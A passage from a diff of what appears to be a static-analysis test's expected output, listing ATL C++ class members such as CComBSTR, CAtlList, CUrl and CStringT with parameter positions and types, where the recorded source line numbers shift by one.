| BSTRToArray | 0 | tagSAFEARRAY ** | -| atl.cpp:433:11:433:16 | CopyTo | 0 | BSTR * | -| atl.cpp:433:11:433:16 | CopyTo | 0 | wchar_t ** | -| atl.cpp:435:11:435:16 | CopyTo | 0 | VARIANT * | -| atl.cpp:435:11:435:16 | CopyTo | 0 | tagVARIANT * | -| atl.cpp:439:8:439:17 | LoadString | 0 | HINSTANCE | -| atl.cpp:439:8:439:17 | LoadString | 0 | void * | -| atl.cpp:439:8:439:17 | LoadString | 1 | UINT | -| atl.cpp:439:8:439:17 | LoadString | 1 | unsigned int | -| atl.cpp:440:8:440:17 | LoadString | 0 | UINT | -| atl.cpp:440:8:440:17 | LoadString | 0 | unsigned int | -| atl.cpp:441:11:441:24 | ReadFromStream | 0 | IStream * | -| atl.cpp:443:11:443:23 | WriteToStream | 0 | IStream * | -| atl.cpp:448:13:448:22 | operator+= | 0 | const CComBSTR & | -| atl.cpp:449:13:449:22 | operator+= | 0 | LPCOLESTR | -| atl.cpp:449:13:449:22 | operator+= | 0 | const wchar_t * | -| atl.cpp:539:3:539:15 | CComSafeArray | 0 | const SAFEARRAY * | -| atl.cpp:539:3:539:15 | CComSafeArray | 0 | const tagSAFEARRAY * | -| atl.cpp:543:11:543:13 | Add | 0 | const SAFEARRAY * | -| atl.cpp:543:11:543:13 | Add | 0 | const tagSAFEARRAY * | -| atl.cpp:545:11:545:13 | Add | 0 | const class:0 & | -| atl.cpp:545:11:545:13 | Add | 1 | BOOL | -| atl.cpp:545:11:545:13 | Add | 1 | bool | -| atl.cpp:553:6:553:10 | GetAt | 0 | LONG | -| atl.cpp:553:6:553:10 | GetAt | 0 | long | -| atl.cpp:564:11:564:15 | SetAt | 0 | LONG | -| atl.cpp:564:11:564:15 | SetAt | 0 | long | -| atl.cpp:564:11:564:15 | SetAt | 1 | const class:0 & | -| atl.cpp:564:11:564:15 | SetAt | 2 | BOOL | -| atl.cpp:564:11:564:15 | SetAt | 2 | bool | -| atl.cpp:566:6:566:15 | operator[] | 0 | long | -| atl.cpp:567:6:567:15 | operator[] | 0 | int | -| atl.cpp:611:3:611:8 | CPathT | 0 | PCXSTR | -| atl.cpp:611:3:611:8 | CPathT | 0 | class:0 | -| atl.cpp:612:3:612:8 | CPathT | 0 | const CPathT & | -| atl.cpp:616:8:616:19 | AddExtension | 0 | PCXSTR | -| atl.cpp:616:8:616:19 | AddExtension | 0 | class:0 | -| atl.cpp:617:8:617:13 | Append | 0 | PCXSTR | -| atl.cpp:617:8:617:13 | Append | 0 | class:0 | -| atl.cpp:620:8:620:14 | Combine | 0 | PCXSTR | -| atl.cpp:620:8:620:14 | Combine | 0 | class:0 | -| atl.cpp:620:8:620:14 | Combine | 1 | PCXSTR | -| atl.cpp:620:8:620:14 | Combine | 1 | class:0 | -| atl.cpp:621:22:621:33 | CommonPrefix | 0 | PCXSTR | -| atl.cpp:621:22:621:33 | CommonPrefix | 0 | class:0 | -| atl.cpp:658:23:658:32 | operator+= | 0 | PCXSTR | -| atl.cpp:658:23:658:32 | operator+= | 0 | class:0 | -| atl.cpp:718:8:718:10 | Add | 0 | const class:0 & | -| atl.cpp:719:7:719:10 | Find | 0 | const class:0 & | -| atl.cpp:730:6:730:15 | operator[] | 0 | int | -| atl.cpp:731:21:731:29 | operator= | 0 | const CSimpleArray & | -| atl.cpp:764:8:764:10 | Add | 0 | const class:0 & | -| atl.cpp:764:8:764:10 | Add | 1 | const class:1 & | -| atl.cpp:765:7:765:13 | FindKey | 0 | const class:0 & | -| atl.cpp:766:7:766:13 | FindVal | 0 | const class:1 & | -| atl.cpp:769:9:769:18 | GetValueAt | 0 | int | -| atl.cpp:770:8:770:13 | Lookup | 0 | const class:0 & | -| atl.cpp:774:8:774:20 | ReverseLookup | 0 | const class:1 & | -| atl.cpp:775:8:775:12 | SetAt | 0 | const class:0 & | -| atl.cpp:775:8:775:12 | SetAt | 1 | const class:1 & | -| atl.cpp:776:8:776:17 | SetAtIndex | 0 | int | -| atl.cpp:776:8:776:17 | SetAtIndex | 1 | const class:0 & | -| atl.cpp:776:8:776:17 | SetAtIndex | 2 | const class:1 & | -| atl.cpp:815:9:815:17 | operator= | 0 | const CUrl & | -| atl.cpp:817:3:817:6 | CUrl | 0 | const CUrl & | -| atl.cpp:820:15:820:26 | Canonicalize | 0 | DWORD | -| atl.cpp:820:15:820:26 | Canonicalize | 0 | unsigned long | -| atl.cpp:823:8:823:15 | CrackUrl | 0 | LPCTSTR | -| atl.cpp:823:8:823:15 | CrackUrl | 0 | const char * | -| atl.cpp:823:8:823:15 | CrackUrl | 1 | DWORD | -| atl.cpp:823:8:823:15 | CrackUrl | 1 | unsigned long | -| atl.cpp:824:15:824:23 | CreateUrl | 0 | LPTSTR | -| atl.cpp:824:15:824:23 | CreateUrl | 0 | char * | -| atl.cpp:824:15:824:23 | CreateUrl | 1 | DWORD * | -| atl.cpp:824:15:824:23 | CreateUrl | 1 | unsigned long * | -| atl.cpp:824:15:824:23 | CreateUrl | 2 | DWORD | -| atl.cpp:824:15:824:23 | CreateUrl | 2 | unsigned long | -| atl.cpp:841:15:841:26 | SetExtraInfo | 0 | LPCTSTR | -| atl.cpp:841:15:841:26 | SetExtraInfo | 0 | const char * | -| atl.cpp:842:15:842:25 | SetHostName | 0 | LPCTSTR | -| atl.cpp:842:15:842:25 | SetHostName | 0 | const char * | -| atl.cpp:843:15:843:25 | SetPassword | 0 | LPCTSTR | -| atl.cpp:843:15:843:25 | SetPassword | 0 | const char * | -| atl.cpp:844:15:844:27 | SetPortNumber | 0 | ATL_URL_PORT | -| atl.cpp:844:15:844:27 | SetPortNumber | 0 | unsigned short | -| atl.cpp:845:15:845:23 | SetScheme | 0 | ATL_URL_SCHEME | -| atl.cpp:846:15:846:27 | SetSchemeName | 0 | LPCTSTR | -| atl.cpp:846:15:846:27 | SetSchemeName | 0 | const char * | -| atl.cpp:847:15:847:24 | SetUrlPath | 0 | LPCTSTR | -| atl.cpp:847:15:847:24 | SetUrlPath | 0 | const char * | -| atl.cpp:848:15:848:25 | SetUserName | 0 | LPCTSTR | -| atl.cpp:848:15:848:25 | SetUserName | 0 | const char * | -| atl.cpp:903:8:903:8 | operator= | 0 | IAtlStringMgr && | -| atl.cpp:903:8:903:8 | operator= | 0 | const IAtlStringMgr & | -| atl.cpp:914:3:914:16 | CSimpleStringT | 0 | const XCHAR * | -| atl.cpp:914:3:914:16 | CSimpleStringT | 0 | const char * | -| atl.cpp:914:3:914:16 | CSimpleStringT | 1 | int | -| atl.cpp:914:3:914:16 | CSimpleStringT | 2 | IAtlStringMgr * | -| atl.cpp:915:3:915:16 | CSimpleStringT | 0 | PCXSTR | -| atl.cpp:915:3:915:16 | CSimpleStringT | 0 | const class:0 * | -| atl.cpp:915:3:915:16 | CSimpleStringT | 1 | IAtlStringMgr * | -| atl.cpp:916:3:916:16 | CSimpleStringT | 0 | const CSimpleStringT & | -| atl.cpp:920:8:920:13 | Append | 0 | const CSimpleStringT & | -| atl.cpp:921:8:921:13 | Append | 0 | PCXSTR | -| atl.cpp:921:8:921:13 | Append | 0 | const class:0 * | -| atl.cpp:921:8:921:13 | Append | 1 | int | -| atl.cpp:922:8:922:13 | Append | 0 | PCXSTR | -| atl.cpp:922:8:922:13 | Append | 0 | const class:0 * | -| atl.cpp:926:15:926:23 | CopyChars | 0 | XCHAR * | -| atl.cpp:926:15:926:23 | CopyChars | 0 | char * | -| atl.cpp:926:15:926:23 | CopyChars | 1 | const XCHAR * | -| atl.cpp:926:15:926:23 | CopyChars | 1 | const char * | -| atl.cpp:926:15:926:23 | CopyChars | 2 | int | -| atl.cpp:927:15:927:23 | CopyChars | 0 | XCHAR * | -| atl.cpp:927:15:927:23 | CopyChars | 0 | char * | -| atl.cpp:927:15:927:23 | CopyChars | 1 | size_t | -| atl.cpp:927:15:927:23 | CopyChars | 2 | const XCHAR * | -| atl.cpp:927:15:927:23 | CopyChars | 2 | const char * | -| atl.cpp:927:15:927:23 | CopyChars | 3 | int | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | 0 | XCHAR * | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | 0 | char * | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | 1 | const XCHAR * | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | 1 | const char * | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | 2 | int | -| atl.cpp:930:9:930:13 | GetAt | 0 | int | -| atl.cpp:931:9:931:17 | GetBuffer | 0 | int | -| atl.cpp:933:9:933:26 | GetBufferSetLength | 0 | int | -| atl.cpp:937:8:937:12 | SetAt | 0 | int | -| atl.cpp:937:8:937:12 | SetAt | 1 | XCHAR | -| atl.cpp:937:8:937:12 | SetAt | 1 | char | -| atl.cpp:938:8:938:16 | SetString | 0 | PCXSTR | -| atl.cpp:938:8:938:16 | SetString | 0 | const class:0 * | -| atl.cpp:938:8:938:16 | SetString | 1 | int | -| atl.cpp:939:8:939:16 | SetString | 0 | PCXSTR | -| atl.cpp:939:8:939:16 | SetString | 0 | const class:0 * | -| atl.cpp:941:9:941:18 | operator[] | 0 | int | -| atl.cpp:1035:3:1035:10 | CStringT | 0 | const VARIANT & | -| atl.cpp:1035:3:1035:10 | CStringT | 0 | const tagVARIANT & | -| atl.cpp:1036:3:1036:10 | CStringT | 0 | const VARIANT & | -| atl.cpp:1036:3:1036:10 | CStringT | 0 | const tagVARIANT & | -| atl.cpp:1036:3:1036:10 | CStringT | 1 | IAtlStringMgr * | -| atl.cpp:1037:3:1037:10 | CStringT | 0 | const CStringT & | -| atl.cpp:1041:3:1041:10 | CStringT | 0 | LPCSTR | -| atl.cpp:1041:3:1041:10 | CStringT | 0 | const char * | -| atl.cpp:1041:3:1041:10 | CStringT | 1 | IAtlStringMgr * | -| atl.cpp:1042:3:1042:10 | CStringT | 0 | LPCWSTR | -| atl.cpp:1042:3:1042:10 | CStringT | 0 | const wchar_t * | -| atl.cpp:1042:3:1042:10 | CStringT | 1 | IAtlStringMgr * | -| atl.cpp:1044:3:1044:10 | CStringT | 0 | char * | -| atl.cpp:1045:3:1045:10 | CStringT | 0 | unsigned char * | -| atl.cpp:1046:3:1046:10 | CStringT | 0 | wchar_t * | -| atl.cpp:1048:3:1048:10 | CStringT | 0 | char | -| atl.cpp:1048:3:1048:10 | CStringT | 1 | int | -| atl.cpp:1049:3:1049:10 | CStringT | 0 | wchar_t | -| atl.cpp:1049:3:1049:10 | CStringT | 1 | int | -| atl.cpp:1060:8:1060:19 | AppendFormat | 0 | PCXSTR | -| atl.cpp:1060:8:1060:19 | AppendFormat | 1 | ... | -| atl.cpp:1061:8:1061:19 | AppendFormat | 0 | UINT | -| atl.cpp:1061:8:1061:19 | AppendFormat | 0 | unsigned int | -| atl.cpp:1061:8:1061:19 | AppendFormat | 1 | ... | -| atl.cpp:1069:7:1069:12 | Insert | 0 | int | -| atl.cpp:1069:7:1069:12 | Insert | 1 | PCXSTR | -| atl.cpp:1070:7:1070:12 | Insert | 0 | int | -| atl.cpp:1070:7:1070:12 | Insert | 1 | XCHAR | -| atl.cpp:1070:7:1070:12 | Insert | 1 | class:0 | -| atl.cpp:1071:12:1071:15 | Left | 0 | int | -| atl.cpp:1074:8:1074:17 | LoadString | 0 | UINT | -| atl.cpp:1074:8:1074:17 | LoadString | 0 | unsigned int | -| atl.cpp:1078:12:1078:14 | Mid | 0 | int | -| atl.cpp:1078:12:1078:14 | Mid | 1 | int | -| atl.cpp:1080:7:1080:13 | Replace | 0 | PCXSTR | -| atl.cpp:1080:7:1080:13 | Replace | 1 | PCXSTR | -| atl.cpp:1081:7:1081:13 | Replace | 0 | XCHAR | -| atl.cpp:1081:7:1081:13 | Replace | 0 | class:0 | -| atl.cpp:1081:7:1081:13 | Replace | 1 | XCHAR | -| atl.cpp:1081:7:1081:13 | Replace | 1 | class:0 | -| atl.cpp:1082:12:1082:16 | Right | 0 | int | -| atl.cpp:1083:8:1083:19 | SetSysString | 0 | BSTR * | -| atl.cpp:1083:8:1083:19 | SetSysString | 0 | wchar_t ** | -| atl.cpp:1084:12:1084:24 | SpanExcluding | 0 | PCXSTR | -| atl.cpp:1085:12:1085:24 | SpanIncluding | 0 | PCXSTR | -| atl.cpp:1086:12:1086:19 | Tokenize | 0 | PCXSTR | -| atl.cpp:1086:12:1086:19 | Tokenize | 1 | int & | -| atl.cpp:1087:13:1087:16 | Trim | 0 | XCHAR | -| atl.cpp:1087:13:1087:16 | Trim | 0 | class:0 | -| atl.cpp:1088:13:1088:16 | Trim | 0 | PCXSTR | -| atl.cpp:1090:13:1090:20 | TrimLeft | 0 | XCHAR | -| atl.cpp:1090:13:1090:20 | TrimLeft | 0 | class:0 | -| atl.cpp:1091:13:1091:20 | TrimLeft | 0 | PCXSTR | -| atl.cpp:1093:13:1093:21 | TrimRight | 0 | XCHAR | -| atl.cpp:1093:13:1093:21 | TrimRight | 0 | class:0 | -| atl.cpp:1094:13:1094:21 | TrimRight | 0 | PCXSTR | -| atl.cpp:1214:8:1214:8 | operator= | 0 | CStringData && | -| atl.cpp:1214:8:1214:8 | operator= | 0 | const CStringData & | -| atl.cpp:1230:3:1230:10 | CStrBufT | 0 | StringType & | -| atl.cpp:1230:3:1230:10 | CStrBufT | 1 | int | -| atl.cpp:1230:3:1230:10 | CStrBufT | 2 | DWORD | -| atl.cpp:1230:3:1230:10 | CStrBufT | 2 | unsigned long | +| atl.cpp:52:18:52:18 | operator= | 0 | const tagSAFEARRAYBOUND & | +| atl.cpp:52:18:52:18 | operator= | 0 | tagSAFEARRAYBOUND && | +| atl.cpp:57:18:57:18 | operator= | 0 | const tagVARIANT & | +| atl.cpp:57:18:57:18 | operator= | 0 | tagVARIANT && | +| atl.cpp:61:18:61:18 | operator= | 0 | const tagSAFEARRAY & | +| atl.cpp:61:18:61:18 | operator= | 0 | tagSAFEARRAY && | +| atl.cpp:70:10:70:10 | _U_STRINGorID | 0 | _U_STRINGorID && | +| atl.cpp:70:10:70:10 | _U_STRINGorID | 0 | const _U_STRINGorID & | +| atl.cpp:70:10:70:10 | operator= | 0 | _U_STRINGorID && | +| atl.cpp:70:10:70:10 | operator= | 0 | const _U_STRINGorID & | +| atl.cpp:71:5:71:17 | _U_STRINGorID | 0 | UINT | +| atl.cpp:71:5:71:17 | _U_STRINGorID | 0 | unsigned int | +| atl.cpp:72:5:72:17 | _U_STRINGorID | 0 | LPCTSTR | +| atl.cpp:72:5:72:17 | _U_STRINGorID | 0 | const char * | +| atl.cpp:196:12:196:14 | Add | 0 | INARGTYPclass:0 | +| atl.cpp:198:12:198:17 | Append | 0 | const CAtlArray & | +| atl.cpp:199:10:199:13 | Copy | 0 | const CAtlArray & | +| atl.cpp:201:8:201:12 | GetAt | 0 | size_t | +| atl.cpp:205:10:205:22 | InsertArrayAt | 0 | size_t | +| atl.cpp:205:10:205:22 | InsertArrayAt | 1 | const CAtlArray * | +| atl.cpp:206:10:206:17 | InsertAt | 0 | size_t | +| atl.cpp:206:10:206:17 | InsertAt | 1 | INARGTYPclass:0 | +| atl.cpp:206:10:206:17 | InsertAt | 2 | size_t | +| atl.cpp:211:10:211:18 | SetAtGrow | 0 | size_t | +| atl.cpp:211:10:211:18 | SetAtGrow | 1 | INARGTYPclass:0 | +| atl.cpp:213:8:213:17 | operator[] | 0 | size_t | +| atl.cpp:259:5:259:12 | CAtlList | 0 | UINT | +| atl.cpp:259:5:259:12 | CAtlList | 0 | UINT | +| atl.cpp:259:5:259:12 | CAtlList | 0 | unsigned int | +| atl.cpp:259:5:259:12 | CAtlList | 0 | unsigned int | +| atl.cpp:262:14:262:20 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:262:14:262:20 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:263:10:263:20 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:263:10:263:20 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:265:14:265:20 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:265:14:265:20 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:266:10:266:20 | AddTailList | 0 | const CAtlList * | +| atl.cpp:266:10:266:20 | AddTailList | 0 | const CAtlList * | +| atl.cpp:267:14:267:17 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:267:14:267:17 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:267:14:267:17 | Find | 1 | POSITION | +| atl.cpp:267:14:267:17 | Find | 1 | POSITION | +| atl.cpp:267:14:267:17 | Find | 1 | __POSITION * | +| atl.cpp:267:14:267:17 | Find | 1 | __POSITION * | +| atl.cpp:268:14:268:22 | FindIndex | 0 | size_t | +| atl.cpp:268:14:268:22 | FindIndex | 0 | size_t | +| atl.cpp:269:8:269:12 | GetAt | 0 | POSITION | +| atl.cpp:269:8:269:12 | GetAt | 0 | POSITION | +| atl.cpp:269:8:269:12 | GetAt | 0 | __POSITION * | +| atl.cpp:269:8:269:12 | GetAt | 0 | __POSITION * | +| atl.cpp:282:14:282:24 | InsertAfter | 0 | POSITION | +| atl.cpp:282:14:282:24 | InsertAfter | 0 | POSITION | +| atl.cpp:282:14:282:24 | InsertAfter | 0 | __POSITION * | +| atl.cpp:282:14:282:24 | InsertAfter | 0 | __POSITION * | +| atl.cpp:282:14:282:24 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:282:14:282:24 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:283:14:283:25 | InsertBefore | 0 | POSITION | +| atl.cpp:283:14:283:25 | InsertBefore | 0 | POSITION | +| atl.cpp:283:14:283:25 | InsertBefore | 0 | __POSITION * | +| atl.cpp:283:14:283:25 | InsertBefore | 0 | __POSITION * | +| atl.cpp:283:14:283:25 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:283:14:283:25 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:293:10:293:14 | SetAt | 0 | POSITION | +| atl.cpp:293:10:293:14 | SetAt | 0 | POSITION | +| atl.cpp:293:10:293:14 | SetAt | 0 | __POSITION * | +| atl.cpp:293:10:293:14 | SetAt | 0 | __POSITION * | +| atl.cpp:293:10:293:14 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:293:10:293:14 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:403:10:403:10 | operator= | 0 | IUnknown && | +| atl.cpp:403:10:403:10 | operator= | 0 | const IUnknown & | +| atl.cpp:405:10:405:10 | operator= | 0 | ISequentialStream && | +| atl.cpp:405:10:405:10 | operator= | 0 | const ISequentialStream & | +| atl.cpp:407:10:407:10 | operator= | 0 | IStream && | +| atl.cpp:407:10:407:10 | operator= | 0 | const IStream & | +| atl.cpp:409:10:409:10 | operator= | 0 | const CComBSTR & | +| atl.cpp:411:5:411:12 | CComBSTR | 0 | const CComBSTR & | +| atl.cpp:412:5:412:12 | CComBSTR | 0 | int | +| atl.cpp:413:5:413:12 | CComBSTR | 0 | int | +| atl.cpp:413:5:413:12 | CComBSTR | 1 | LPCOLESTR | +| atl.cpp:413:5:413:12 | CComBSTR | 1 | const wchar_t * | +| atl.cpp:414:5:414:12 | CComBSTR | 0 | int | +| atl.cpp:414:5:414:12 | CComBSTR | 1 | LPCSTR | +| atl.cpp:414:5:414:12 | CComBSTR | 1 | const char * | +| atl.cpp:415:5:415:12 | CComBSTR | 0 | LPCOLESTR | +| atl.cpp:415:5:415:12 | CComBSTR | 0 | const wchar_t * | +| atl.cpp:416:5:416:12 | CComBSTR | 0 | LPCSTR | +| atl.cpp:416:5:416:12 | CComBSTR | 0 | const char * | +| atl.cpp:417:5:417:12 | CComBSTR | 0 | CComBSTR && | +| atl.cpp:420:13:420:18 | Append | 0 | const CComBSTR & | +| atl.cpp:421:13:421:18 | Append | 0 | wchar_t | +| atl.cpp:422:13:422:18 | Append | 0 | char | +| atl.cpp:423:13:423:18 | Append | 0 | LPCOLESTR | +| atl.cpp:423:13:423:18 | Append | 0 | const wchar_t * | +| atl.cpp:424:13:424:18 | Append | 0 | LPCSTR | +| atl.cpp:424:13:424:18 | Append | 0 | const char * | +| atl.cpp:425:13:425:18 | Append | 0 | LPCOLESTR | +| atl.cpp:425:13:425:18 | Append | 0 | const wchar_t * | +| atl.cpp:425:13:425:18 | Append | 1 | int | +| atl.cpp:426:13:426:22 | AppendBSTR | 0 | BSTR | +| atl.cpp:426:13:426:22 | AppendBSTR | 0 | wchar_t * | +| atl.cpp:427:13:427:23 | AppendBytes | 0 | const char * | +| atl.cpp:427:13:427:23 | AppendBytes | 1 | int | +| atl.cpp:428:13:428:23 | ArrayToBSTR | 0 | const SAFEARRAY * | +| atl.cpp:428:13:428:23 | ArrayToBSTR | 0 | const tagSAFEARRAY * | +| atl.cpp:429:13:429:22 | AssignBSTR | 0 | const BSTR | +| atl.cpp:429:13:429:22 | AssignBSTR | 0 | const wchar_t * | +| atl.cpp:430:10:430:15 | Attach | 0 | BSTR | +| atl.cpp:430:10:430:15 | Attach | 0 | wchar_t * | +| atl.cpp:431:13:431:23 | BSTRToArray | 0 | LPSAFEARRAY * | +| atl.cpp:431:13:431:23 | BSTRToArray | 0 | tagSAFEARRAY ** | +| atl.cpp:434:13:434:18 | CopyTo | 0 | BSTR * | +| atl.cpp:434:13:434:18 | CopyTo | 0 | wchar_t ** | +| atl.cpp:436:13:436:18 | CopyTo | 0 | VARIANT * | +| atl.cpp:436:13:436:18 | CopyTo | 0 | tagVARIANT * | +| atl.cpp:440:10:440:19 | LoadString | 0 | HINSTANCE | +| atl.cpp:440:10:440:19 | LoadString | 0 | void * | +| atl.cpp:440:10:440:19 | LoadString | 1 | UINT | +| atl.cpp:440:10:440:19 | LoadString | 1 | unsigned int | +| atl.cpp:441:10:441:19 | LoadString | 0 | UINT | +| atl.cpp:441:10:441:19 | LoadString | 0 | unsigned int | +| atl.cpp:442:13:442:26 | ReadFromStream | 0 | IStream * | +| atl.cpp:444:13:444:25 | WriteToStream | 0 | IStream * | +| atl.cpp:449:15:449:24 | operator+= | 0 | const CComBSTR & | +| atl.cpp:450:15:450:24 | operator+= | 0 | LPCOLESTR | +| atl.cpp:450:15:450:24 | operator+= | 0 | const wchar_t * | +| atl.cpp:540:5:540:17 | CComSafeArray | 0 | const SAFEARRAY * | +| atl.cpp:540:5:540:17 | CComSafeArray | 0 | const tagSAFEARRAY * | +| atl.cpp:544:13:544:15 | Add | 0 | const SAFEARRAY * | +| atl.cpp:544:13:544:15 | Add | 0 | const tagSAFEARRAY * | +| atl.cpp:546:13:546:15 | Add | 0 | const class:0 & | +| atl.cpp:546:13:546:15 | Add | 1 | BOOL | +| atl.cpp:546:13:546:15 | Add | 1 | bool | +| atl.cpp:554:8:554:12 | GetAt | 0 | LONG | +| atl.cpp:554:8:554:12 | GetAt | 0 | long | +| atl.cpp:565:13:565:17 | SetAt | 0 | LONG | +| atl.cpp:565:13:565:17 | SetAt | 0 | long | +| atl.cpp:565:13:565:17 | SetAt | 1 | const class:0 & | +| atl.cpp:565:13:565:17 | SetAt | 2 | BOOL | +| atl.cpp:565:13:565:17 | SetAt | 2 | bool | +| atl.cpp:567:8:567:17 | operator[] | 0 | long | +| atl.cpp:568:8:568:17 | operator[] | 0 | int | +| atl.cpp:612:5:612:10 | CPathT | 0 | PCXSTR | +| atl.cpp:612:5:612:10 | CPathT | 0 | class:0 | +| atl.cpp:613:5:613:10 | CPathT | 0 | const CPathT & | +| atl.cpp:617:10:617:21 | AddExtension | 0 | PCXSTR | +| atl.cpp:617:10:617:21 | AddExtension | 0 | class:0 | +| atl.cpp:618:10:618:15 | Append | 0 | PCXSTR | +| atl.cpp:618:10:618:15 | Append | 0 | class:0 | +| atl.cpp:621:10:621:16 | Combine | 0 | PCXSTR | +| atl.cpp:621:10:621:16 | Combine | 0 | class:0 | +| atl.cpp:621:10:621:16 | Combine | 1 | PCXSTR | +| atl.cpp:621:10:621:16 | Combine | 1 | class:0 | +| atl.cpp:622:24:622:35 | CommonPrefix | 0 | PCXSTR | +| atl.cpp:622:24:622:35 | CommonPrefix | 0 | class:0 | +| atl.cpp:659:25:659:34 | operator+= | 0 | PCXSTR | +| atl.cpp:659:25:659:34 | operator+= | 0 | class:0 | +| atl.cpp:719:10:719:12 | Add | 0 | const class:0 & | +| atl.cpp:720:9:720:12 | Find | 0 | const class:0 & | +| atl.cpp:731:8:731:17 | operator[] | 0 | int | +| atl.cpp:732:23:732:31 | operator= | 0 | const CSimpleArray & | +| atl.cpp:765:10:765:12 | Add | 0 | const class:0 & | +| atl.cpp:765:10:765:12 | Add | 1 | const class:1 & | +| atl.cpp:766:9:766:15 | FindKey | 0 | const class:0 & | +| atl.cpp:767:9:767:15 | FindVal | 0 | const class:1 & | +| atl.cpp:770:11:770:20 | GetValueAt | 0 | int | +| atl.cpp:771:10:771:15 | Lookup | 0 | const class:0 & | +| atl.cpp:775:10:775:22 | ReverseLookup | 0 | const class:1 & | +| atl.cpp:776:10:776:14 | SetAt | 0 | const class:0 & | +| atl.cpp:776:10:776:14 | SetAt | 1 | const class:1 & | +| atl.cpp:777:10:777:19 | SetAtIndex | 0 | int | +| atl.cpp:777:10:777:19 | SetAtIndex | 1 | const class:0 & | +| atl.cpp:777:10:777:19 | SetAtIndex | 2 | const class:1 & | +| atl.cpp:816:11:816:19 | operator= | 0 | const CUrl & | +| atl.cpp:818:5:818:8 | CUrl | 0 | const CUrl & | +| atl.cpp:821:17:821:28 | Canonicalize | 0 | DWORD | +| atl.cpp:821:17:821:28 | Canonicalize | 0 | unsigned long | +| atl.cpp:824:10:824:17 | CrackUrl | 0 | LPCTSTR | +| atl.cpp:824:10:824:17 | CrackUrl | 0 | const char * | +| atl.cpp:824:10:824:17 | CrackUrl | 1 | DWORD | +| atl.cpp:824:10:824:17 | CrackUrl | 1 | unsigned long | +| atl.cpp:825:17:825:25 | CreateUrl | 0 | LPTSTR | +| atl.cpp:825:17:825:25 | CreateUrl | 0 | char * | +| atl.cpp:825:17:825:25 | CreateUrl | 1 | DWORD * | +| atl.cpp:825:17:825:25 | CreateUrl | 1 | unsigned long * | +| atl.cpp:825:17:825:25 | CreateUrl | 2 | DWORD | +| atl.cpp:825:17:825:25 | CreateUrl | 2 | unsigned long | +| atl.cpp:842:17:842:28 | SetExtraInfo | 0 | LPCTSTR | +| atl.cpp:842:17:842:28 | SetExtraInfo | 0 | const char * | +| atl.cpp:843:17:843:27 | SetHostName | 0 | LPCTSTR | +| atl.cpp:843:17:843:27 | SetHostName | 0 | const char * | +| atl.cpp:844:17:844:27 | SetPassword | 0 | LPCTSTR | +| atl.cpp:844:17:844:27 | SetPassword | 0 | const char * | +| atl.cpp:845:17:845:29 | SetPortNumber | 0 | ATL_URL_PORT | +| atl.cpp:845:17:845:29 | SetPortNumber | 0 | unsigned short | +| atl.cpp:846:17:846:25 | SetScheme | 0 | ATL_URL_SCHEME | +| atl.cpp:847:17:847:29 | SetSchemeName | 0 | LPCTSTR | +| atl.cpp:847:17:847:29 | SetSchemeName | 0 | const char * | +| atl.cpp:848:17:848:26 | SetUrlPath | 0 | LPCTSTR | +| atl.cpp:848:17:848:26 | SetUrlPath | 0 | const char * | +| atl.cpp:849:17:849:27 | SetUserName | 0 | LPCTSTR | +| atl.cpp:849:17:849:27 | SetUserName | 0 | const char * | +| atl.cpp:904:10:904:10 | operator= | 0 | IAtlStringMgr && | +| atl.cpp:904:10:904:10 | operator= | 0 | const IAtlStringMgr & | +| atl.cpp:915:5:915:18 | CSimpleStringT | 0 | const XCHAR * | +| atl.cpp:915:5:915:18 | CSimpleStringT | 0 | const char * | +| atl.cpp:915:5:915:18 | CSimpleStringT | 1 | int | +| atl.cpp:915:5:915:18 | CSimpleStringT | 2 | IAtlStringMgr * | +| atl.cpp:916:5:916:18 | CSimpleStringT | 0 | PCXSTR | +| atl.cpp:916:5:916:18 | CSimpleStringT | 0 | const class:0 * | +| atl.cpp:916:5:916:18 | CSimpleStringT | 1 | IAtlStringMgr * | +| atl.cpp:917:5:917:18 | CSimpleStringT | 0 | const CSimpleStringT & | +| atl.cpp:921:10:921:15 | Append | 0 | const CSimpleStringT & | +| atl.cpp:922:10:922:15 | Append | 0 | PCXSTR | +| atl.cpp:922:10:922:15 | Append | 0 | const class:0 * | +| atl.cpp:922:10:922:15 | Append | 1 | int | +| atl.cpp:923:10:923:15 | Append | 0 | PCXSTR | +| atl.cpp:923:10:923:15 | Append | 0 | const class:0 * | +| atl.cpp:927:17:927:25 | CopyChars | 0 | XCHAR * | +| atl.cpp:927:17:927:25 | CopyChars | 0 | char * | +| atl.cpp:927:17:927:25 | CopyChars | 1 | const XCHAR * | +| atl.cpp:927:17:927:25 | CopyChars | 1 | const char * | +| atl.cpp:927:17:927:25 | CopyChars | 2 | int | +| atl.cpp:928:17:928:25 | CopyChars | 0 | XCHAR * | +| atl.cpp:928:17:928:25 | CopyChars | 0 | char * | +| atl.cpp:928:17:928:25 | CopyChars | 1 | size_t | +| atl.cpp:928:17:928:25 | CopyChars | 2 | const XCHAR * | +| atl.cpp:928:17:928:25 | CopyChars | 2 | const char * | +| atl.cpp:928:17:928:25 | CopyChars | 3 | int | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | 0 | XCHAR * | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | 0 | char * | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | 1 | const XCHAR * | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | 1 | const char * | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | 2 | int | +| atl.cpp:931:11:931:15 | GetAt | 0 | int | +| atl.cpp:932:11:932:19 | GetBuffer | 0 | int | +| atl.cpp:934:11:934:28 | GetBufferSetLength | 0 | int 